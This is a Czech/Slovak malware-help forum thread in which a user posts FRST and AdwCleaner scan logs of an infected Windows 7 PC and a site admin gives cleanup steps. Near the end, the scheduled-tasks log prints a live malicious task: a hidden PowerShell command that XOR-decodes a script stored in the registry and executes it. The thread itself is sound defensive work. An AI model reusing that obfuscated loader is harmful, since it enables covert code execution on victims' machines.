2023-11-23 10:35 - 2017-06-12 11:10 - 000000000 ____D C:\ProgramData\VMware
2023-11-23 10:35 - 2016-06-04 15:16 - 000000000 ____D C:\Program Files (x86)\Google
2023-11-23 10:32 - 2021-07-29 08:59 - 000000400 __RSH C:\ProgramData\ntuser.pol
2023-11-23 10:31 - 2020-11-29 22:35 - 000000000 ____D C:\ProgramData\VirtualBox
2023-11-23 10:31 - 2019-02-03 09:09 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2023-11-23 10:31 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-11-23 02:21 - 2016-06-04 16:02 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2023-11-22 21:38 - 2016-09-10 17:45 - 000000000 ____D C:\Program Files (x86)\Opera
2023-11-22 16:15 - 2016-08-21 23:14 - 000000000 ____D C:\Users\John\AppData\Roaming\FileZilla
2023-11-22 15:32 - 2022-01-09 22:28 - 000000000 ____D C:\Users\John\AppData\Roaming\Signal
2023-11-22 12:42 - 2022-05-28 18:10 - 000000000 ____D C:\Users\John\AppData\Roaming\ImageGlass
2023-11-22 11:43 - 2018-03-11 14:57 - 000228136 _____ C:\Users\John\AppData\Local\GDIPFONTCACHEV1.DAT
2023-11-22 10:41 - 2018-03-12 09:31 - 005633824 _____ C:\Windows\system32\FNTCACHE.DAT
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Roaming\VMware
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Local\VMware
2023-11-21 16:56 - 2021-07-20 10:12 - 000003832 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1473525916
2023-11-20 22:31 - 2023-01-23 13:25 - 000000000 ____D C:\Users\John\AppData\Local\KeePassXC
2023-11-20 00:01 - 2019-01-08 15:42 - 000034241 _____ C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2023-11-19 20:02 - 2016-06-05 14:18 - 000000000 ____D C:\ProgramData\Riot Games
2023-11-19 14:33 - 2019-01-31 03:33 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2023-11-17 14:27 - 2021-03-31 18:56 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\PowerPoint
2023-11-17 11:42 - 2021-03-29 12:13 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Excel
2023-11-17 11:37 - 2016-06-04 15:16 - 000000000 ____D C:\Users\John\AppData\Local\Deployment
2023-11-16 19:24 - 2016-06-04 16:36 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent
2023-11-16 19:21 - 2019-06-04 22:22 - 000000000 ____D C:\Users\John\AppData\Local\BitTorrentHelper
2023-11-16 19:03 - 2020-01-06 15:07 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent 2.2
2023-11-16 19:00 - 2020-03-13 19:30 - 000000000 ____D C:\Users\John\AppData\Local\CrashDumps
2023-11-16 18:59 - 2019-10-01 14:26 - 000000000 ____D C:\Users\John\AppData\Roaming\Wireshark
2023-11-16 18:49 - 2018-05-27 10:31 - 000000000 ____D C:\Temp
2023-11-16 18:49 - 2016-06-04 15:09 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2023-11-15 23:27 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Postman
2023-11-15 21:52 - 2020-07-24 18:13 - 000045056 _____ C:\Users\John\.wakatime.db
2023-11-15 21:52 - 2016-06-04 14:57 - 000000000 ____D C:\Users\John
2023-11-15 08:19 - 2023-01-22 15:03 - 000000000 ____D C:\Users\John\AppData\Roaming\Python
2023-11-15 08:13 - 2017-02-20 12:40 - 000000000 ____D C:\Users\John\New folder
2023-11-14 08:45 - 2023-03-21 20:28 - 000003628 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
2023-11-14 08:45 - 2023-03-21 20:28 - 000003500 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
2023-11-13 18:14 - 2023-04-23 11:37 - 000002106 _____ C:\Users\John\Desktop\Postman.lnk
2023-11-13 18:14 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Postman
2023-11-11 21:28 - 2020-12-14 00:48 - 000138240 ___SH C:\Users\John\Documents\Thumbs.db
2023-11-11 15:50 - 2023-04-02 11:22 - 000000000 ____D C:\Users\John\AppData\Roaming\.minecraft
2023-11-11 15:41 - 2020-03-17 01:47 - 000000000 ____D C:\Users\John\AppData\Roaming\.tlauncher
2023-11-10 09:40 - 2016-07-24 21:43 - 000000000 ____D C:\Windows\Minidump
2023-11-09 14:45 - 2023-05-01 10:15 - 000000000 ____D C:\Users\John\AppData\Local\Postman
2023-11-07 22:21 - 2021-01-20 14:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Authy Desktop
2023-11-03 13:22 - 2017-12-14 02:01 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Word
2023-11-02 12:01 - 2022-12-08 13:49 - 000000112 _____ C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2023-11-02 00:39 - 2023-09-05 22:43 - 001042153 ____N C:\Windows\Minidump\110223-103491-01.dmp
2023-10-27 18:21 - 2021-04-04 12:00 - 000003434 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-10-27 18:21 - 2021-04-04 12:00 - 000003306 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Files in the root of some directories ========

2020-05-03 14:07 - 2020-05-03 14:07 - 000000048 ____H () C:\Program Files (x86)\8iq24splw1.dat
2018-12-26 11:13 - 2023-08-12 09:04 - 000000033 _____ () C:\Users\John\AppData\Roaming\AdobeWLCMCache.dat
2020-06-18 22:09 - 2020-06-18 22:09 - 000000068 _____ () C:\Users\John\AppData\Roaming\changzhi_leidian.data
2019-07-14 00:42 - 2020-06-27 12:52 - 000000808 _____ () C:\Users\John\AppData\Roaming\jd-gui.cfg
2018-12-26 11:41 - 2021-07-13 10:52 - 000000028 _____ () C:\Users\John\AppData\Roaming\kulerdata.json
2022-12-08 13:49 - 2023-11-02 12:01 - 000000112 _____ () C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2022-09-04 13:34 - 2022-09-04 13:34 - 000000142 ___SH () C:\Users\John\AppData\Roaming\UOD.DAT
2019-01-08 15:42 - 2023-11-20 00:01 - 000034241 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2019-01-05 02:03 - 2019-01-06 17:26 - 000004634 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterDefault.xml
2022-07-29 00:24 - 2022-07-29 00:24 - 000000142 ___SH () C:\Users\John\AppData\Roaming\YINSLITO.DLL
2022-09-04 17:34 - 2022-09-04 17:34 - 000000142 ___SH () C:\Users\John\AppData\Local\700937146F5B4E19A662A91210046348.rct
2016-11-26 21:00 - 2019-10-04 07:27 - 000001480 _____ () C:\Users\John\AppData\Local\Adobe Uložit pro web 13.0 Prefs
2018-09-06 08:27 - 2018-09-06 08:27 - 000001111 _____ () C:\Users\John\AppData\Local\gamma_ramp.reg
2018-01-28 23:40 - 2023-09-28 14:32 - 000000600 _____ () C:\Users\John\AppData\Local\PUTTY.RND
2021-11-18 10:20 - 2021-11-18 10:20 - 000002939 _____ () C:\Users\John\AppData\Local\recently-used.xbel
2018-07-27 13:26 - 2018-07-27 13:26 - 000000487 _____ () C:\Users\John\AppData\Local\ReclaiMe.config
2017-06-16 14:06 - 2023-10-23 21:37 - 000007665 _____ () C:\Users\John\AppData\Local\Resmon.ResmonCfg
2019-03-04 16:27 - 2019-03-04 16:27 - 000000003 _____ () C:\Users\John\AppData\Local\updater.log
2019-03-04 16:27 - 2019-03-04 16:27 - 000000425 _____ () C:\Users\John\AppData\Local\UserProducts.xml

==================== FLock ==============================

2017-10-27 23:09 C:\Windows\infpub.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-09-04 01:24
==================== End of FRST.txt ========================
Přílohy
Addition.zip
(81.43 KiB) Staženo 82 x

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118715
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prihlasovanie do FB, otvaranie okien v browseri

#2 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

mivefe5888
Návštěvník
Návštěvník
Příspěvky: 6
Registrován: 23 lis 2023 19:26

Re: Prihlasovanie do FB, otvaranie okien v browseri

#3 Příspěvek od mivefe5888 »

# -------------------------------
# Malwarebytes AdwCleaner 8.4.0.0
# -------------------------------
# Build: 08-30-2022
# Database: 2023-07-19.3 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 11-24-2023
# Duration: 00:01:04
# OS: Windows 7 Service Pack 1
# Scanned: 32102
# Detected: 15


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Trojan.LVBP.ED C:\Program Files (x86)\Object

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

PUP.Optional.QuickStart pelmeidfhdlhlbjimpabfcbnnojbboma

***** [ Chromium URLs ] *****

PUP.Optional.Conduit http://search.conduit.com/?ctid=CT33218 ... 7BBE&SSPV=
PUP.Optional.Legacy Search Here
PUP.Optional.Legacy Trovi search
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ1D81TPZ
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ1D81TPZ
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ4Y3Y2NT
PUP.Optional.Legacy http://www.trovi.com/?gd=&ctid=CT332189 ... F073&SSPV=
PUP.Optional.Legacy istartsurf
PUP.Optional.Legacy istartsurf
PUP.Optional.Legacy istartsurf
PUP.Optional.MySearch Search Here
PUP.Optional.Trovi Trovi search
PUP.Optional.Trovi http://www.trovi.com/?gd=&ctid=CT332189 ... F073&SSPV=

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.


AdwCleaner[S00].txt - [3231 octets] - [12/07/2019 19:54:44]
AdwCleaner[C00].txt - [3181 octets] - [12/07/2019 19:55:17]
AdwCleaner[S01].txt - [4123 octets] - [06/06/2021 17:24:21]
AdwCleaner[C01].txt - [3945 octets] - [06/06/2021 17:27:48]
AdwCleaner[S02].txt - [3009 octets] - [29/07/2021 16:20:39]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S03].txt ##########

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118715
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prihlasovanie do FB, otvaranie okien v browseri

#4 Příspěvek od Rudy »

Nalezené položky smažte (dejte do karantény), restartujte a dejte nové logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

mivefe5888
Návštěvník
Návštěvník
Příspěvky: 6
Registrován: 23 lis 2023 19:26

Re: Prihlasovanie do FB, otvaranie okien v browseri

#5 Příspěvek od mivefe5888 »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-11-2023 02
Ran by John (administrator) on JOHN-PC (25-11-2023 11:43:28)
Running from C:\Users\John\Downloads\FRST64.exe
Loaded Profiles: John
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(C:\Program Files (x86)\Opera\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\95.0.4635.90\opera_crashreporter.exe
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Required\CEP\CEPHtmlEngine\CEPHtmlEngine.exe <3>
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Required\DynamicLinkMediaServer\32\dynamiclinkmanager.exe
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Joyent, Inc -> Joyent, Inc) C:\Program Files\Adobe\Adobe Photoshop CC 2015\node.exe
(C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\John\AppData\Local\Discord\app-1.0.9024\Discord.exe <6>
(explorer.exe ->) () [File not signed] I:\stahovanie\gammy_v0.9.64\gammy.exe
(explorer.exe ->) (Adobe Systems Incorporated -> Adobe Systems, Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe
(explorer.exe ->) (Figma, Inc. -> ) C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe
(explorer.exe ->) (Johannes Millan) [File not signed] [File is in use] I:\stahovanie\superProductivity-7.12.0.exe
(explorer.exe ->) (Malwarebytes Inc. -> Malwarebytes) I:\stahovanie\scoped_dir3748_485742690\AdwCleaner.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler64.exe
(I:\stahovanie\superProductivity-7.12.0.exe ->) (Johannes Millan) [File not signed] C:\Users\John\AppData\Local\Temp\2EDNJDl4YnJmwr5naxHqvVY7EUJ\superProductivity.exe <4>
(Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\opera.exe <57>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(services.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SolidWorks) [File not signed] C:\Program Files (x86)\Common Files\SOLIDWORKS Shared\Service\SolidWorksLicensing.exe
(services.exe ->) (South River Technologies -> South River Technologies, Inc.) C:\Program Files\WebDrive\wdService.exe
(services.exe ->) (Synology Inc. -> ) C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Tonalio GmbH -> Sandboxie-Plus.com) D:\windows programy\Sandboxie-Plus\SbieSvc.exe
(services.exe ->) (Trace Software International -> ) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe
(services.exe ->) (VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [Figma Agent] => C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe [6795040 2023-10-31] (Figma, Inc. -> )
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe [70912472 2023-11-16] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG3000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDG.DLL [30720 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Windows x64\Print Processors\Canon TS3300 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDG3.DLL [482816 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3000 series: C:\Windows\system32\CNMLMDG.DLL [485376 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3300 series: C:\Windows\system32\CNMLMG3.DLL [1311232 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON WF-2870 Series 64MonitorBE: C:\Windows\system32\E_YLMBXVE.DLL [187392 2018-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\HP 1853 Status Monitor: C:\Windows\system32\hpinksts1853LM.dll [467464 2019-11-28] (HP Inc -> HP Inc.)
HKLM\...\Print\Monitors\HP Discovery Port Monitor (HP DeskJet 2700 series): C:\Windows\system32\HPDiscoPM1853.dll [996512 2022-01-25] (HP Inc. -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\Installer\chrmstp.exe [2023-03-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{BC455173-F501-4356-804F-571FAFB6EA9A}] -> RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\Installer\chrmstp.exe [2020-11-24] (Avast Software s.r.o. -> AVAST Software)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {41D08211-8A07-4B1A-948A-B4B8BF58632A} - System32\Tasks\Robotka
Task: {AAAA1BA0-9973-47D1-B128-DD3F1CC9DEF6} - System32\Tasks\Motivacia
Task: {483F605F-4ACC-438C-A6BA-C7E06893DE4E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {E064BC14-AB10-4997-B691-1589F21C0F1F} - System32\Tasks\AdobeAAMUpdater-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {A44084B5-2748-4011-95F6-DAF5403D9398} - System32\Tasks\AdobeGCInvoker-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {64C634CD-B1AF-4B19-894B-BA25119772A0} - System32\Tasks\AdwCleaner_onReboot => I:\stahovanie\scoped_dir3748_485742690\AdwCleaner.exe [8791352 2023-11-24] (Malwarebytes Inc. -> Malwarebytes)
Task: {C826FD7A-B8B6-40D8-A041-2076C47165CA} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [4621920 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
Task: {B6215906-8048-45F1-AC2E-0D0F74C0649A} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {C2B756A2-8142-4B50-B9C0-C715DB45B991} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {0A9D12E3-3DCF-40E3-80B9-803013CD2C22} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (No File)
Task: {9D6C3930-F621-4296-A748-5865083AD527} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1741416 2020-09-22] (Avast Software s.r.o. -> Avast Software)
Task: {4D82607E-7526-4BF6-9F28-C3328EC91A74} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {6B681D84-73C0-42F0-816A-FAC346025961} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {E82B4641-76E0-465D-875B-7C8D9733E5FD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-06] (Piriform Ltd -> Piriform Ltd)
Task: {8B006428-2138-449F-8FEF-00FD52F474FC} - System32\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {89F2385D-C566-491E-8211-929329243711} - System32\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {6CA9BD1E-E93C-4F62-A79E-4BC1371F6109} - System32\Tasks\HPCustParticipation HP DeskJet 2700 series => C:\Program Files\HP\HP DeskJet 2700 series\Bin\HPCustPartic.exe [6732960 2022-01-25] (HP Inc. -> HP Inc.)
Task: {454DE0F3-8EFA-4669-8D0B-C409CA75EFF0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {9254C62C-104D-473C-BB40-833CC10AD75B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {571EEDE0-9D34-4AC1-9B1F-AD573C6CAC52} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {5D6BF89C-14FD-4209-BEDE-8D6B54312C30} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
Task: {75A225D9-05D2-41D3-89C6-7C86CBC51CBE} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KE4x9F5p\4F379EE4-AF11-4D1B-8863-5E5A969FD790 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation) -> -WINdowstyLE hiDDEN -comMAnD "icm ([sCripTBlOCk]::creatE([sTRInG]::JoIN('', ((get-ITEmpRoPerty -PATh 'Hklm:\soFtware\GhiSlerkE4X9').'ke4X9F5' | % { [CHar]($_ -bXOr 128) }))))"
Task: {E296B281-E679-4FF5-9072-68B6B9295C53} - System32\Tasks\Microsoft\Windows\RestartManager\{369FD764-7CF1-4ad7-B1C9-2445F4CAF599} => C:\Windows\system32\rmclient.exe [16896 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
